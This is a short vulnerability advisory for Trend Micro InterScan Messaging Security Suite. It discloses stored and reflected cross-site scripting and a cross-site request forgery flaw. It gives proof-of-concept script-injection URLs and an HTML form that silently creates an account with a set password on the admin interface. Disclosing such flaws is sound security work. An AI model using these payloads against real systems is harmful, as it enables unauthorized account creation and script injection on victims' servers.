Trend Micro InterScan Messaging Security Suite Multiple Vulnerabilities

Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.

Proof of Concept

The vulnerabilities POC are as follow:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS

hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script>alert('XSS')</script>

Non-persistent/Reflected XSS

hxxps://127.0.0.1/initUpdSchPage.imss?src=<script>alert('XSS')</script>

Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)

<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

Solution

Currently, we are not aware of any vendor solution. You may contact the vendor for patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized user make use of this vulnerability.

References

http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html